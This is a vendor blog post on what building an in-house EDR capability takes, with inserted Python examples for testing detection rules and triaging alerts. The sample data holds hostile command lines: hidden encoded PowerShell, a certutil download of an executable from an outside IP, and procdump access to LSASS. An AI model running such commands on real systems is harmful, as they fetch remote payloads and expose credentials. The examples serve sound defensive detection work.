Once a security team recognizes the value of an Endpoint Detection and Response (EDR) capability and begins to scope the project, the list of requirements starts to add up—and the cost along with it. The EDR shopping list includes hardware and software, employees to hire and manage, processes to design and implement, plus custom software and integrations to develop. While this may be feasible for a large organization with a sizable budget, it is a challenge for most businesses. It is also easy to overlook the complexities involved in implementing EDR until the project is well underway.
Here is a closer look at the elements that go into building and deploying an EDR capability to help guide you and your team.
1: Hardware and Software
First and foremost, the team will need to evaluate and select an EDR platform. Selection should involve running proofs of concept (POCs) with a number of vendors, which is an expensive process in and of itself. Once a selection is made, the implementation may involve procuring and setting up on-premises hardware to host the EDR tool and working with IT to test and deploy the endpoint sensor.
Any time an organization runs on-premises tools, it will also need ongoing internal support to keep them running. The level of support will vary depending on the product and the size of your organization, and it is important to include these costs.
For additional guidelines and 15 questions to ask potential vendors, download an EDR Buyer’s Guide.
2: Security Team Resources
This is one of the most crucial items on the list—and one of the most challenging. Doing EDR well requires a lot of human resources. Not only are these resources typically not a part of most security organizations, but they are extremely difficult to find and expensive to hire.
The most obvious need from a security team standpoint will be experts to respond to alerts. Based on Red Canary’s experience managing detection and response, this will initially require 1-2 analysts per 1,000 endpoints. This number should decrease over time as the team implements more efficient response processes (and with scale). Good security analysts are in high demand, so this can be one of the biggest challenges in implementing EDR. Note that analysts capable of doing endpoint response may not be the same as analysts from a typical SOC that deals primarily with network security.
Threat research is another crucial component. The detection platform must be updated continuously to monitor for new attack tactics and techniques. A company may get lucky and find a unicorn who can both respond to alerts and do threat hunting and research, but these individuals are in very short supply.
Learn why many organizations are turning to specialized security services instead of hiring.
It is also important to have access to software developers to build automation, integrations, tools, etc. Automation and integration are what actually improve efficiency, and doing them the right way for your team requires custom software. This can be a major challenge because security teams typically aren’t accustomed to hiring or managing software developers. One option is to borrow developers from other parts of your organization, but this also may not be realistic.
EDR very quickly becomes a “big-data” problem, so the team will benefit from hiring a data-focused engineer or data scientist. The bigger the organization, the more data it will have, and the more value a data scientist can bring. The main goal for this individual (along with software developers) is to reduce the need to continue hiring analysts at such a high rate (1 per 500-1000 endpoints). With the right data platform and suppression capability, you can reduce the rate to 1 per 5000 endpoints or even more depending on the investment made.
3: Processes to Implement
While you can’t go out and “buy” processes, they are a core requirement that needs to be built into an EDR plan. Developing the processes that take a raw endpoint alert from creation to closure is a huge component of building a true capability. A strong Incident Response (IR) process is the most critical. SANS provides the following basic structure for an IR process:
- Preparation: Preparing users and IT staff to handle potential incidents should they arise
- Identification: Determining whether an event is indeed a security incident
- Containment: Limiting the damage of the incident and isolating affected systems to prevent further damage
- Eradication: Finding the root cause of the incident and removing the attacker’s malware, persistence mechanisms, and access from affected systems
- Recovery: Permitting affected systems back into the production environment and ensuring no threat remains
- Lessons learned: Completing incident documentation and performing analysis to ultimately learn from the incident and potentially improve future response efforts
This process needs to happen efficiently to minimize an attacker’s dwell time and limit their opportunity to steal data, money, and critical IP. Many organizations have strong IR processes in place to handle alerts from other security products and just need to fit in endpoint detection. If you don’t have IR processes in place, be prepared to take this on as part of your EDR project.
Validating a threat (Step 2 above) may seem simple, but accurately identifying threats requires a number of strong processes in and of itself. It’s also important to assess the potential risk and impact of a threat to know how to prioritize the rest of the response since most organizations will have many threats occurring at the same time.
Incorporating lessons learned back into the detection capability (Step 6) is another critical associated process. This is vitally important in EDR where attackers change tactics very rapidly. It’s important that when a new tactic is observed it can be easily codified into a detection rule, reviewed, and then rolled into the production detection environment.
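One way to make “codify, review, roll into production” concrete, as an added example that is not Red Canary’s or any EDR vendor’s code: a newly observed tactic (an Office application spawning a script interpreter) is written as a declarative rule, and a review gate checks it against a small set of analyst-labelled events before it is promoted. The event fields, the rule format, the exclusion for a hypothetical in-house deployment script, and all sample events are constructed for illustration.

```python
"""Codify an observed tactic as a detection rule and gate it on a review set.

Added example, not code from the original page. Event field names, the rule
format and the sample events below are constructed for illustration.
"""
import re

# Declarative rule: every condition must match a process-creation event,
# and no exclusion may match. Patterns are regular expressions.
RULE = {
    "name": "office_app_spawns_script_host",
    "description": "Office application launching a script interpreter",
    "conditions": {
        "parent_name": r"^(winword|excel|powerpnt|outlook)\.exe$",
        "process_name": r"^(powershell|wscript|cscript|mshta|cmd)\.exe$",
    },
    "exclusions": {
        # Hypothetical known-good macro deployment script (assumption, not a real path).
        "command_line": r"\\\\fileserver\\deploy\\macro-updater\.ps1",
    },
}


def matches(rule, event):
    """Return True when all conditions match and no exclusion matches."""
    for field, pattern in rule["conditions"].items():
        if not re.search(pattern, event.get(field, ""), re.IGNORECASE):
            return False
    for field, pattern in rule.get("exclusions", {}).items():
        if re.search(pattern, event.get(field, ""), re.IGNORECASE):
            return False
    return True


# Constructed review set: events an analyst labelled during the investigation
# that surfaced the tactic (True = malicious, False = benign).
REVIEW_SET = [
    ({"parent_name": "WINWORD.EXE", "process_name": "powershell.exe",
      "command_line": "powershell -nop -w hidden -enc SQBFAFgA"}, True),
    ({"parent_name": "EXCEL.EXE", "process_name": "cmd.exe",
      "command_line": "cmd /c certutil -urlcache -f http://198.51.100.7/a.exe"}, True),
    ({"parent_name": "explorer.exe", "process_name": "powershell.exe",
      "command_line": "powershell Get-ChildItem"}, False),
    ({"parent_name": "WINWORD.EXE", "process_name": "powershell.exe",
      "command_line": r"powershell -File \\fileserver\deploy\macro-updater.ps1"}, False),
    ({"parent_name": "OUTLOOK.EXE", "process_name": "chrome.exe",
      "command_line": "chrome https://example.com"}, False),
]


def review(rule, labelled_events):
    """Count true positives, false positives and false negatives over the review set."""
    tp = fp = fn = 0
    for event, is_malicious in labelled_events:
        hit = matches(rule, event)
        if hit and is_malicious:
            tp += 1
        elif hit and not is_malicious:
            fp += 1
        elif not hit and is_malicious:
            fn += 1
    return tp, fp, fn


def promote(rule, labelled_events, max_fp=0):
    """Review gate: the rule reaches production only if it catches every labelled
    true positive and stays within the false-positive budget."""
    _tp, fp, fn = review(rule, labelled_events)
    return fn == 0 and fp <= max_fp


if __name__ == "__main__":
    print(RULE["name"], "tp/fp/fn =", review(RULE, REVIEW_SET))
    print("promote to production:", promote(RULE, REVIEW_SET))
```

The review set is the part that makes this a process rather than a one-off query: dropping the exclusion would turn the deployment script into a false positive and the gate would refuse to promote the rule, which is exactly the feedback loop the lessons-learned step is meant to close.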
For more insights on improving your incident response program, watch an on-demand webinar: How to Take Control of Your Response Operations
4: Custom Software and Integration
As a security organization implements and grows into its EDR capability, it will identify many pieces of software that can help it become more efficient. Some can be bought, some can’t. Almost all require some amount of customization.
The most fundamental piece of software is the analysis platform. It may be possible to use the EDR tool itself for analysis, but this is usually inefficient because EDR consoles are built around investigating a single alert or endpoint rather than working through alert volume.
A good analysis platform includes (but is not limited to) the following capabilities:
- Prioritizes alerts
- Deduplicates repeated alerts
- Allows for suppression based on coarse or granular rules
- Enriches alerts with additional context
- Manages analyst workflow
- Provides mechanisms for bulk action
A very mature organization with a mature SIEM implementation in place for network security may be able to use the same tool for endpoint-related analysis. However, these tools are often bulky and not geared for new data sources.
Once an alert is confirmed as a threat via the analysis platform, it needs to move forward into the remediation phase. In many organizations, this means interacting with the IT group through their workflow. Oftentimes the IT group works off of a ticket-tracking system and the mechanism for getting remediation done is to create a ticket automatically from the confirmed threat. In bigger organizations this can get more complex since there will be multiple IT groups and the tickets will need to be routed to the correct group based on what endpoint it occurred on or what type of threat it is. The more complex this gets, the more need there is for custom software development.
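To show what the analysis platform capabilities listed above and the ticket routing described here look like in code, the following is an added example, not Red Canary’s or any vendor’s software. It deduplicates raw alerts, applies coarse and granular suppression rules, enriches each alert with asset context, prioritizes by rule severity and asset criticality, and routes a confirmed threat to the IT group that should receive the ticket. The alert fields, asset inventory, severity table, suppression rules and host names are all constructed sample data.

```python
"""Alert triage pipeline: deduplicate, suppress, enrich, prioritize, route.

Added example, not code from the original page. Alerts, assets, severities
and routing rules below are constructed sample data; field names are assumptions.
"""
from collections import defaultdict
from fnmatch import fnmatch

# Constructed sample alerts, roughly as an EDR sensor might emit them.
SAMPLE_ALERTS = [
    {"id": 1, "host": "fin-ws-014", "user": "jdoe", "rule": "office_spawns_shell",
     "process": "C:\\Windows\\System32\\cmd.exe", "parent": "WINWORD.EXE", "hash": "aa11"},
    {"id": 2, "host": "fin-ws-014", "user": "jdoe", "rule": "office_spawns_shell",
     "process": "C:\\Windows\\System32\\cmd.exe", "parent": "WINWORD.EXE", "hash": "aa11"},
    {"id": 3, "host": "build-01", "user": "svc_ci", "rule": "encoded_powershell",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "jenkins-agent.exe", "hash": "bb22"},
    {"id": 4, "host": "dc-02", "user": "SYSTEM", "rule": "lsass_access",
     "process": "C:\\Tools\\procdump64.exe", "parent": "cmd.exe", "hash": "cc33"},
    {"id": 5, "host": "eng-lt-101", "user": "asmith", "rule": "encoded_powershell",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "explorer.exe", "hash": "dd44"},
]

# Constructed asset inventory used for enrichment: criticality and owning IT group.
ASSETS = {
    "fin-ws-014": {"criticality": 2, "it_group": "desktop-support", "role": "workstation"},
    "build-01":   {"criticality": 2, "it_group": "platform-eng",    "role": "ci-server"},
    "dc-02":      {"criticality": 3, "it_group": "identity-ops",    "role": "domain-controller"},
    "eng-lt-101": {"criticality": 1, "it_group": "desktop-support", "role": "laptop"},
}

RULE_SEVERITY = {"office_spawns_shell": 2, "encoded_powershell": 2, "lsass_access": 3}

# Suppression rules. A rule with only "rule" is coarse; adding a host glob
# and parent process makes it granular (assumed format).
SUPPRESSIONS = [
    {"rule": "encoded_powershell", "host": "build-*", "parent": "jenkins-agent.exe",
     "reason": "CI agents run encoded PowerShell by design"},
]


def dedupe_key(alert):
    """Alerts with the same host, rule, process and hash collapse into one."""
    return (alert["host"], alert["rule"], alert["process"], alert["hash"])


def is_suppressed(alert):
    for s in SUPPRESSIONS:
        if s["rule"] != alert["rule"]:
            continue
        if "host" in s and not fnmatch(alert["host"], s["host"]):
            continue
        if "parent" in s and s["parent"].lower() != alert["parent"].lower():
            continue
        return True
    return False


def enrich(alert):
    """Attach asset context; unknown hosts get the lowest criticality, not a crash."""
    asset = ASSETS.get(alert["host"], {"criticality": 1, "it_group": "unknown", "role": "unknown"})
    return {**alert, **asset}


def priority(alert):
    return RULE_SEVERITY.get(alert["rule"], 1) * alert["criticality"]


def triage(alerts):
    """Return enriched, prioritized alerts with suppressed ones removed and
    duplicates collapsed; 'count' records how many raw alerts each represents."""
    groups = defaultdict(list)
    for a in alerts:
        groups[dedupe_key(a)].append(a)
    out = []
    for members in groups.values():
        first = members[0]
        if is_suppressed(first):
            continue
        e = enrich(first)
        e["count"] = len(members)
        e["priority"] = priority(e)
        out.append(e)
    out.sort(key=lambda x: (-x["priority"], x["id"]))
    return out


def route(alert):
    """Ticket routing: credential access or anything on a domain controller goes
    to the security IR queue; everything else to the endpoint's owning IT group."""
    if alert["rule"] == "lsass_access" or alert["role"] == "domain-controller":
        return "security-ir"
    return alert["it_group"]


if __name__ == "__main__":
    for a in triage(SAMPLE_ALERTS):
        print(f"P{a['priority']} x{a['count']} {a['host']} {a['rule']} -> {route(a)}")
```

On the constructed input the two identical Word-spawns-cmd alerts collapse into one, the CI server’s encoded PowerShell is suppressed by the granular rule, and the domain controller’s LSASS access sorts to the top and routes to the IR queue rather than a general IT ticket. Suppression is keyed on rule, host pattern and parent process together so that the same behavior on a user laptop still surfaces.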
In the course of performing EDR, the security team will identify many useful standalone tools that can help drive efficiencies. These may be as simple as “run a query and then massage the results into summary data” or as complicated as “do machine learning to look for patterns in binary usage.” These kinds of tools can make a massive difference in the efficiency of a security team and it pays huge dividends to have someone on the team capable of developing one-off tools from time to time. Note: many security analysts are capable of some amount of this, so an organization may not need a dedicated resource.
Implementing EDR is expensive and complicated. It takes a great deal of planning and expertise, and it’s not something you can simply drop into an existing security program. Before purchasing an EDR tool, make sure your team understands the complexities and is prepared to build the appropriate pieces to drive value from your investment.
Many Red Canary customers went through this type of evaluation before realizing that Managed Endpoint Detection and Response was more effective than assembling internal resources and expertise. Red Canary delivers a complete EDR capability that includes the required technology, processes, and people. So rather than evaluating hardware/software, hiring multiple employees, developing processes, and customizing integrations, you can simply drop Red Canary into your organization and dramatically improve your security in hours.
To learn more about how to implement an EDR capability, watch an on-demand webinar I recently held with Carbon Black. It explores the three paths to EDR and helps you understand what to consider when deciding if outsourcing is right for you.